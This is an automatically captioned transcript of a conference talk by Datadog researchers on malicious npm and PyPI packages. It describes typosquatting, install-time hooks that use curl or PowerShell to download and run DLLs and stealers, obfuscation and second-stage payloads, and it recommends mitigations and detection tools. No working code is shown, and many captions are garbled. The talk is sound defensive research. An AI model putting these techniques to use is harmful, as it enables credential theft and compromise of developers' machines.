WEBVTT

00:00.000 --> 00:12.960
Okay, so hi, so supply chain attacks, so we probably all remember solar winds or heard about

00:12.960 --> 00:18.960
solar winds back in 2020, maybe put supply chain attacks on the radar of everybody, certainly

00:18.960 --> 00:26.160
myself, as sort of revealed the potential impact of an attack like this that could have

00:26.160 --> 00:32.320
far-reaching consequences. Since then, there have been a number of other pretty sophisticated

00:32.320 --> 00:36.800
supply chain attacks like XZU tells recently, which was a very long term package takeover

00:36.800 --> 00:43.360
attack, something like 3CX, which was like a chain, an attack chain of supply chain attacks

00:43.360 --> 00:49.200
to compromise, and then application. And then, you know, just every day, there's we seemingly

00:49.200 --> 00:53.280
hear about more and more supply chain attacks coming out of various complexities, so this thing

00:53.280 --> 00:58.960
is here to stay, and so one of the things we're going to be talking about today is some strategies

00:58.960 --> 01:04.240
that Sebastian, my colleague, and I see all the time in our continuous monitoring of open

01:04.240 --> 01:10.080
source package ecosystems, strategies that these threat actors like to use, and, you know,

01:10.080 --> 01:13.680
basically, like, what do they want? How are they trying to get it? And then also,

01:13.680 --> 01:17.760
make some recommendations for how people can protect themselves from this kind of attack.

01:18.320 --> 01:24.400
So, my name is Ian Cutts. I am a security researcher at Data Dog, specializing in supply

01:24.400 --> 01:29.600
chain security. So, yeah, I'm Sebastian, what are you also? I work for in that I'll, in that

01:29.600 --> 01:34.400
I'll, for about a year and a half, I also work with the unease supply chain, and also with

01:34.400 --> 01:42.720
in application security for another three-thirds of topics. Okay. Yeah, so just to kind of set

01:42.720 --> 01:46.160
the stage, right? So, what is the supply chain attack, what is the software supply chain? So,

01:47.120 --> 01:50.720
at a very high level, right? We have a simple software supply chain here. Basically,

01:50.720 --> 01:54.080
we have some developer who wants to deliver some code to some consumer on the other end.

01:55.280 --> 01:58.960
And so, there's this kind of high level process of like maintaining the source code,

01:58.960 --> 02:03.200
developing the source code right somewhere in diversion control. Then we go to build the source

02:03.200 --> 02:07.040
code and some like build system, right? And when we do that, we're probably going to be pulling in

02:07.040 --> 02:12.240
some third-party dependencies to get involved in that process. And then finally, publishing the

02:12.240 --> 02:16.560
finished artifact somewhere or the source code, if it's like a library, right? In some way,

02:16.560 --> 02:23.920
where the consumer can access it. And so, basically, like, at each step of this pipeline,

02:23.920 --> 02:27.840
there's various kinds of attacks that can take place, so we can be compromising the integrity

02:27.840 --> 02:32.480
of the source code via like a malicious PR. For example, we can mess with the build system

02:32.480 --> 02:37.840
or mess with the imports or outputs. We could go after the package repository itself,

02:37.840 --> 02:44.240
like maybe do like an account takeover of the publisher, right? And then we can also try to

02:44.240 --> 02:50.800
get our compromised or malicious dependencies into that build process. In terms of what these

02:50.800 --> 02:54.800
third actors are after pretty simple, there's kind of three things we see a lot.

02:55.680 --> 03:00.800
Credential theft, so developers have access to a lot of attractive targets for these attackers,

03:00.800 --> 03:05.920
like, I don't know, data or code, right? Very simply, so a lot of times we'll see them going

03:05.920 --> 03:11.520
after API keys or credentials like this. Resource misuse, so things like crypto miners,

03:12.080 --> 03:15.280
you install some package and it's got an embedded crypto miner. And so, there you go.

03:16.000 --> 03:20.480
Or a thirdly something like SolarWinds, so it's a downstream compromise where some, you know,

03:20.480 --> 03:27.280
downstream client of the package is being targeted. And so, yeah,

03:28.720 --> 03:33.120
it's maybe the choice to use up and source is more complicated than it might seem at first,

03:33.120 --> 03:37.440
security-wise, so we'd like to feel confident in, you know, our decision to do so, and so that's

03:37.440 --> 03:45.920
kind of what we'll be talking about here. Okay, so the tick-team malicious packages will go

03:45.920 --> 03:52.880
that we've got though. We're going to explain a little bit on how we are using this CLI tool,

03:52.880 --> 04:00.400
which is a tool that we created in data though internally for scanning PIPI and MPN ecosystem.

04:04.000 --> 04:15.280
So, basically, we take, we use the guardall, which pulls data from the package published in

04:15.280 --> 04:24.160
PIPI or NMPN and this tool makes use of two kind of analysis. One call, metadata analysis,

04:24.880 --> 04:31.200
which is basically the detection of some patterns present in the characteristics of the, of the,

04:31.280 --> 04:37.440
of the package itself, imagining something like the registration email address of a

04:37.440 --> 04:43.200
alpha maintainer, right? In this case, you can be used in a disposal email address, and that's the

04:43.200 --> 04:53.920
discount of the detection. On the Recon, you'll, it may use another type of detection called source

04:54.080 --> 05:01.280
called analysis, which under the hood, we are using two types of two tools. One is called Yara,

05:01.280 --> 05:09.360
which makes use of, it's very good for, in the kind of for compromises, such as domains or

05:09.360 --> 05:16.000
IP addresses. For instance, in this case, we can use like this kind of addictions in a Yar rule.

05:17.280 --> 05:23.280
In, also, we are using some bread, right? This is another kind of tool that detects kind of a

05:23.360 --> 05:29.280
semantic analysis for a, and it's pretty good to detect like a kind of a behavioral pattern

05:29.280 --> 05:35.760
in the code, right? For, in machine this, we are using, it's a, it's a, it shines really well

05:36.480 --> 05:44.160
with the detection of, for example, execution of a, makes 64 payloads. So, this sample execution

05:44.160 --> 05:50.640
of a guard dog, this tool, you can see, there are the, those are the like the, the rules that

05:50.640 --> 05:57.360
detected in a, in a real package in MPM. Once a couple of things, do notice in, of guard dog,

05:57.360 --> 06:05.360
is that, you know, it allows you to use JSON and set it for my output to do a more like,

06:06.480 --> 06:12.960
automated analysis on the outcome. And also, one thing to notice is that guard dog, it doesn't

06:12.960 --> 06:18.480
give you any, like, like a final decision, if the package is malicious or not, one thing to notice

06:18.560 --> 06:25.680
is that it just rises the risks on the package, okay? The, the actual decision has to be taken

06:25.680 --> 06:32.240
by an actual free-husher at the moment. So, this is how we use, you use internally, guard, guard

06:32.240 --> 06:41.040
dog in data dog. Basically, we implemented a set of auto crawlers, use, that are basically

06:41.040 --> 06:47.120
crawling the, the repositories type I and MPM. We, roughly, you can, can imagine that we have,

06:47.120 --> 06:59.600
like, 300K for, uh, PIPI and 75K of, uh, PIPI, uh, sorry, 300K of MPM packages and 75K of, uh,

06:59.600 --> 07:07.200
PIPI packages, uh, amounts. And then we scan this once with guard dog. And the, the, the, the findings

07:07.200 --> 07:14.640
that we were talking about, uh, are filtered then with a set of behavioral, behavioral patterns,

07:14.720 --> 07:22.320
and, uh, a combination of machine learning techniques, okay? Uh, to have an idea where, where,

07:22.320 --> 07:30.080
considering having, like, a 0.6% of suspicious or interesting enough packages to further,

07:30.080 --> 07:36.640
the further analysis with just the, the, the triage stage is, um, it's conducted by a human,

07:36.640 --> 07:42.560
right? And if confirmed, then the, the malicious package is, the sample is uploaded to a public

07:42.560 --> 07:49.840
repository called malicious public data fed. Okay. So, um, so yeah, now we'll just kind of go through,

07:49.840 --> 07:54.480
we have four kind of common strategies we see these thread actors using and we'll just kind of

07:54.480 --> 07:58.080
use some of these packages we've been finding with guard dog to kind of support kind of the case

07:58.080 --> 08:03.440
for making. Um, so the first is to target popular packages to get at their developers,

08:03.440 --> 08:06.720
we were saying earlier developers are attractive targets for these attackers. So, how do you

08:06.720 --> 08:12.240
get developers? You go after the packages they want to use. Um, so basically there's kind of two ways,

08:12.240 --> 08:17.120
you can go about this. Um, if you're the attacker, you can publish a new already malicious package

08:17.120 --> 08:22.880
or you can seek to take over an existing package. Um, the first case is very easy. You can just upload

08:22.880 --> 08:28.080
whatever you want like NPM say, but it's not a very efficient strategy because like 10k packages

08:28.080 --> 08:32.240
get uploaded to NPM every day, so nobody knows your package, right? So if you're going to tackle

08:32.240 --> 08:37.680
how do I get people to take notice of my package? And so the way they often do this is very,

08:37.840 --> 08:41.920
not very sophisticated, right? You just kind of try to affiliate the malicious package with some

08:41.920 --> 08:47.920
targeted package. Um, usually by like a naming trick. So we see a lot of combo squatting where

08:47.920 --> 08:52.240
if I'm targeting requests, I could do something like pie requests or something or type of squatting

08:52.240 --> 08:56.400
where the name of the malicious package is the type of the targeted package. You can see like that.

08:56.400 --> 09:01.440
Not very sophisticated stuff. Um, on the other hand, package takeover is a lot more lucrative

09:01.440 --> 09:06.160
because these packages already have developers that use them, but it's harder for the attacker.

09:06.160 --> 09:10.080
They have to perform some kind of compromise together to work. And so this could be like

09:10.080 --> 09:16.160
compromising the maintainer credentials, malicious PR, other things like that. So if you go back to

09:16.160 --> 09:22.160
our architecture, kind of overview, this could take place anywhere right at any stage of the pipeline,

09:22.160 --> 09:27.520
depending on what the attacker is trying to do. Um, so here we have an example that we found in the

09:27.520 --> 09:34.480
past year of a name squatting attacker, a combo squatting attack. Um, so on the left we have a legitimate

09:34.560 --> 09:38.560
NPM package and on the right we have a malicious one from a threat actor. We've called

09:38.560 --> 09:43.840
tenacious puns on a data dog. So it's a DPRK affiliated threat actor and we use like the national

09:43.840 --> 09:48.160
dog breed of the nation's like name the threat actor. So the puns on is a DPR from Doug from North

09:48.160 --> 09:54.480
Korea. Um, so you can see very simply passport passwords, JS. Um, otherwise like if you look at the

09:54.480 --> 09:58.240
readmees, they're exactly the same although like the graphic didn't load on the left, but you know,

09:58.240 --> 10:02.720
you just copy the code, backdoor it and upload it with a similar name, right? Not very sophisticated.

10:03.360 --> 10:08.080
Um, on the package take over side, the stuff tends to be more interesting, right? There was right at the end of

10:08.080 --> 10:13.600
2024, there was a notable package takeover instance for this Python package called UltraLidics,

10:13.600 --> 10:18.400
where they were running like a vulnerable GitHub action on their repo. You can see in the pink box,

10:18.400 --> 10:23.840
like the the branch name is used like unescaped in a shell command. And so this allowed an attacker

10:23.840 --> 10:28.480
to submit a malicious PR with a crafted branch name, which like ended up running a shell script in

10:28.480 --> 10:32.240
the context of the GitHub action. And so they're able to like exaltrate the pipeline published

10:32.240 --> 10:38.000
token and upload some malicious versions to Python. There's a great analysis of this attack at that

10:38.000 --> 10:45.600
blog post. Um, and so like package takeover is complicated, but the name squatting stuff is very

10:45.600 --> 10:50.160
simple to avoid by just like doing the simple obvious checks. So our advice would be just to use

10:50.160 --> 10:56.400
simple guardrails to minimize the consequences of simple mistakes like a typo. Um, in our research

10:56.400 --> 11:01.280
in Q4, we found that at least 70% of the malicious packages we triage were using some kind of

11:01.280 --> 11:06.560
name squatting or targeting some other package. So if you're an end user, if you're like a user of

11:06.560 --> 11:10.560
an open source package, just make sure you're spelling everything correctly, the simple obvious solution.

11:11.840 --> 11:15.920
To get around package takeover, you could use version pinning, don't use like just the latest version

11:15.920 --> 11:20.400
of the package, okay, something happens. Um, and then if you're lucky enough to work like a company

11:20.480 --> 11:26.240
who can do this for you or in some institution who would do this use like an internal, um, not copy

11:26.240 --> 11:30.080
it, sort of an internal version of the package repository with a verified artifacts to kind of

11:31.120 --> 11:37.280
only pull things from, you'll cut off a lot of these kinds of problems that way. Um, meanwhile,

11:37.280 --> 11:41.600
like for the package repositories themselves, I think we would suggest like introducing some kind of

11:41.600 --> 11:46.320
moderated publishing. So simply like not allowing people to publish on typosquads of certainly

11:46.320 --> 11:50.880
prominent packages, but ideally all packages, whether it's some kind of verification of like

11:50.880 --> 11:58.000
this code looks too similar to an existing package, like no. Um, and then also post-compromise,

11:59.120 --> 12:03.360
take those package names out of circulation and replace them with security placeholders

12:03.360 --> 12:07.600
so that people who didn't upload or sorry update their dependencies don't get re-infected.

12:11.200 --> 12:15.600
Okay, now we're going to talk about the next strategy you used by Threadaclors.

12:17.040 --> 12:23.600
Which is called exploit developers via install time hooks. So install time hooks is a method that

12:23.600 --> 12:30.720
can be used in the package as like a IPI or NPM that trigger at install time, right?

12:31.840 --> 12:39.360
This is a, this is a very like visual way to exploit something. So how, how this actual

12:39.440 --> 12:45.040
works in the in the in the in the wild. I wanted to go over with an example. So let's say,

12:46.960 --> 12:53.920
I'm an attacker and I publish two set of two set of artifacts. One to NPM with a malicious payload,

12:53.920 --> 13:00.720
very visual. I don't know with the install time install execution. And another like a sample repo

13:00.720 --> 13:07.760
into GitHub for doing whatever. This, this packet, this a GitHub repo does have not malicious

13:07.920 --> 13:14.640
behavior whatsoever. The only thing that it has is like is it has like a dependency to the NPM package

13:15.440 --> 13:25.120
that was published before. Then the user, sorry, a GitHub user is lured into download the package,

13:25.120 --> 13:32.480
right? There are a number of ways how Threadaclors can achieve this. One of the favorite techniques

13:32.480 --> 13:40.160
implemented by DPRK, Threadaclors is to use them as a job interview, right? Hey, I need to do this

13:40.160 --> 13:45.280
job for me. You have to do this test, test it out. You have to download this code and execute it. Then

13:47.280 --> 13:54.240
bam, this, this, this code is pulled from the NPM and triggered. So if you look at the

13:54.240 --> 13:59.440
again in the architecture diagram that I was shown before, this attack goes over in the use of

13:59.440 --> 14:06.800
compromised dependency and it's a compromised package. Parts. And in here we can see an example of how

14:08.240 --> 14:15.440
this self-delicious, self-deleted initial attack access vector was used by the Threadaclors test

14:15.440 --> 14:23.280
function. Again, in data though, we name the the known Threadaclors function in this

14:24.000 --> 14:30.720
indication goes after the breath of the the country that was the Threadaclors representing.

14:32.720 --> 14:40.240
And so we can see here that it's executing the reference JS file, which in this case downloads

14:40.240 --> 14:52.800
using a curl. Downloads are DLL. I use this run the allow 32 binary to be a trusted binary execution

14:53.440 --> 15:01.520
of the DLL code that is the downloading. This is a technique very used again for by this Threadaclors.

15:02.960 --> 15:09.120
Another example from in this time, in this case from PIPI, from the Lappardexos package.

15:09.840 --> 15:17.760
In this case was from MUT 8694, MUT stands for miscellaneous and attributed Thread.

15:18.000 --> 15:25.280
Basically, this is the way we name a Threadaclors that are not belonging to a known or a

15:25.280 --> 15:31.040
nation's Threadaclors, but we can cluster the attacks into one specific cluster.

15:31.680 --> 15:41.600
So as you can see, he's already in the installation process and in the file, in the installation

15:41.920 --> 15:48.800
process, he's also using PowerShell to download a binary and execute it. This time was a stealer.

15:50.640 --> 15:57.920
So what can we do with this? Be wary of install time hooks, right? This sounds obvious, but it's

15:58.960 --> 16:06.480
many Threadaclors often disguises or covered this in under like downstream attacks like dependencies.

16:06.480 --> 16:15.840
So that attack is not so obvious, right? So one recommendation or mitigation, we can say,

16:16.400 --> 16:23.600
first of all, 85% of the malicious package we observe during Q4, we're using this kind of attack.

16:23.600 --> 16:29.360
So this is important, right? For picture containers, we can say, leave it to the usage of in

16:29.360 --> 16:35.680
cell scripts as much as possible. We see times that times and times again that developers are

16:36.240 --> 16:41.440
using the installed time hooks for greetings. Hey, thank you for installing this package.

16:41.440 --> 16:48.640
I mean, okay, but there are other ways to achieve that, right? For end users, if possible,

16:48.640 --> 16:54.720
completely disabled in cell script. For a PIPI, you can use wheels. This doesn't implement

16:54.800 --> 17:03.120
set up like installation scripts, but for NPM, it probably will break stuff. You can only

17:03.120 --> 17:09.040
version what are them for that matter. Garlic is the tool ways we showed earlier. So for

17:09.040 --> 17:16.320
package repositories, one, you can use these packages using this, probably not very helpful,

17:16.320 --> 17:23.520
but surely it can help in some cases. And also perform regular audits if packages are using this.

17:25.600 --> 17:30.320
Okay, great. So the third thing we say a lot is the use of obfuscation to kind of hide

17:30.320 --> 17:34.640
with these, what they're doing. So if you're a threat actor and you want to deliver malware via NPM,

17:34.640 --> 17:38.640
I'll probably run into your right away, is that everybody can see the malware. So you need to hide it in

17:38.640 --> 17:44.240
some way. So you can then pin like one thing we see a lot is the use of this obfuscator called

17:44.240 --> 17:50.400
obfuscator.io, which produces this garbled sort of looking texture at the bottom. What it does is

17:50.720 --> 17:55.120
it takes the input code and like one thing it replaces the variable names with random ones.

17:55.120 --> 18:00.080
It removes the formatting, but then it also kind of packs the code in a certain way where it's

18:00.080 --> 18:04.320
getting unpacked at runtime and actually being executed. So it makes it difficult to read

18:04.320 --> 18:09.680
and difficult for static analysis to help you on. Fortunately, it's relatively easy to

18:09.680 --> 18:14.080
partially unobfuscated or deobfuscated. And so indeed, that sample we were just looking at when

18:14.080 --> 18:19.680
you deobfuscated it, deobfuscates to this in part. So this is two screenshots from an info

18:19.680 --> 18:24.720
stealer called BeaverTail, which is a DPRK associated in Foceler. So you know on the lettering

18:24.720 --> 18:29.440
that we have a second stage being downloaded and then on the right, so we have some data exploitation.

18:31.680 --> 18:36.400
So again, you'll see you'll need to be on the lookout if you're like the user of a package

18:36.400 --> 18:41.120
or if you're using a package to build something. There's just another example of this.

18:42.400 --> 18:48.240
On the Python side, it tends to be a little different. So we see a lot of like decode or

18:48.240 --> 18:54.320
an executed pattern, so base 64 or decompression or decryption or like character encoding stuff.

18:54.320 --> 18:58.560
And it just goes to the point that like ecosystems have their own kind of obfuscation

18:59.280 --> 19:06.960
tactics or techniques that people use. So the obvious recommendation is just say no to obfuscation.

19:06.960 --> 19:11.840
There's no good reason to distribute open source code that's intentionally difficult to read.

19:12.000 --> 19:14.560
So don't write it, don't use it, don't else it.

19:19.360 --> 19:24.080
And the last thread she we're going to see is the minimized exposure by using a second stage payload.

19:25.280 --> 19:30.880
So this is an example of how the second stage payload is used.

19:30.880 --> 19:37.680
If in case you are not aware, malicious actors are using this thing that is called a second stage

19:37.760 --> 19:45.760
payload which is deliver one small portion of like just a downloader of the real stuff.

19:46.320 --> 19:51.120
So you only have to deal like for instance, in this case we're seeing this response example

19:51.120 --> 19:56.080
which lures the victim to install the package as we discussed. It runs automatically the script

19:56.640 --> 20:04.240
and then download the DLL and then runs it, right? The point here is that the DLL has the actual payload.

20:04.320 --> 20:09.120
The only thing that was like in the package was the link to download it, right?

20:10.880 --> 20:16.560
Again in architecture diagram, this goes into the use compromise dependency or use compromise

20:16.560 --> 20:24.480
package. Here is an example of using power shell to download that button and stealer. Again,

20:25.760 --> 20:29.920
the malicious payload is hosted in gear up, not in MPN or PIPI.

20:30.880 --> 20:35.440
On our example, using again a fuscation, the method that I was talking about,

20:36.240 --> 20:45.120
is concealing a bash script that's installed a service to run a minor.

20:46.480 --> 20:51.600
So what are you going to do with this? Make sure your code is behaving, okay?

20:52.160 --> 20:54.800
How easier say it than done, right?

20:57.040 --> 21:02.000
So from patchment owners, we can say about using external runtime downloads,

21:02.560 --> 21:11.200
it's harder. It's not always to do it, able to do this, but in several times we see that

21:11.200 --> 21:16.000
it's used, it's overused, right? So for end users,

21:16.960 --> 21:22.080
examine if I package downloads, have some of those buttons, like,

21:22.080 --> 21:27.520
is, again, this is harder to achieve, but Garder can help out here. Otherwise, you can use a

21:27.520 --> 21:33.280
container to somehow mitigate the exposure of the host. Yes, you can try.

21:34.480 --> 21:39.280
So the thing called supply chain firewall. So with the tail end of last year, we released the

21:39.280 --> 21:45.520
open source package that basically is just a drop in CLI tool to filter your NPM and PIPI

21:45.520 --> 21:50.160
install or PIPI install commands, excuse me. So it'll inspect the install targets, it'll check

21:50.160 --> 21:55.120
them against lists of known bad packages, or like, if their vulnerability is, it'll let you know about

21:55.120 --> 21:59.760
that too. And then, yeah, it'll just, it'll kind of, if you set up your environment the right

21:59.760 --> 22:05.200
way, it'll passively scan all of your commands. So if there's the PIPI install command, if you like,

22:06.880 --> 22:14.080
and yeah, okay, it's one final thought. For patchment owners, don't be shady. That means

22:15.760 --> 22:23.360
leave the bad guys do the weird stuff, try to do like the most obviously banning code behavior,

22:23.360 --> 22:28.480
right? For end users, don't be an easy target. If you're installing something that you're on

22:28.480 --> 22:36.800
aware of what it is, do your research check test, probably isolated, right? And for package

22:36.800 --> 22:43.520
prepositories, lastly, increase the barrier to end 20 for predators. It's really, really easy for

22:43.600 --> 22:49.600
predators to publish, bogus, or malicious packages. So there are a lot of good improvement

22:49.600 --> 22:56.880
on opportunities there to prevent that for the techniques we saw today. And yep, that's it.

23:05.520 --> 23:07.200
We have two minutes for questions.

23:07.200 --> 23:10.320
Yep, sure. So go ahead, sorry.

23:37.200 --> 23:48.800
Yeah, that's a great question. So the short answer is, that's kind of it. It's very early

23:48.800 --> 23:54.960
days for this tool we hope to. Oh, I'm sorry, the question was, if packages are being taken

23:54.960 --> 23:58.560
down quickly from these open source ecosystems, what is supply chain fire? Well, actually doing for

23:58.560 --> 24:05.680
you. So you're right. Right now, it's kind of only good for, on the malicious side, for things

24:05.680 --> 24:08.560
that are known to be malicious, right? So if it's been taken down the threat has been kind of

24:08.560 --> 24:13.280
neutralized in some sense, these things do kind of like a voider around in different mirrors and things

24:13.280 --> 24:18.480
maybe. There's, it also consults OSV.dev. So there's like a secondary function for pointing out

24:18.480 --> 24:22.400
vulnerabilities. We hope to integrate like scanning capabilities into the tool later on,

24:22.400 --> 24:25.600
maybe facilitated by guard dog. Yeah, that's where we are today.

24:35.680 --> 24:50.000
Sorry, coming in. You'll focus on the unsupporting and the text port. Almost nothing will

24:50.000 --> 24:55.680
be the example place. So there is any force about the plug-ins in the developer file, in fact,

24:55.680 --> 25:05.440
in addition to the code. Yeah, so if I, I understand correctly, if it's like, we are focusing

25:05.520 --> 25:10.880
a lot of on the package container, but if there's something we can do on the developer side.

25:13.200 --> 25:23.840
So basically, we are, we're given like a couple of good tips for every single part, right?

25:23.840 --> 25:30.960
For instance, for the developers, we said something about like, trying not to run or to provide

25:31.120 --> 25:37.120
a sophisticated code, right? But this is like, this is something like, it has to be implemented,

25:37.120 --> 25:42.160
this controller has to be implemented in all parts. Like, we can say to the developer, hey,

25:42.160 --> 25:45.280
don't office care your code. We can detect it, but if the developers,

25:45.280 --> 25:50.320
package containers or repositories are not preventing to upload to open source repositories.

25:51.040 --> 25:54.560
Office-cated code is like, that's pretty much everything we can do, right?

25:55.600 --> 25:57.600
I think we're out of time. So thank you.

26:00.960 --> 26:04.240
Thank you.

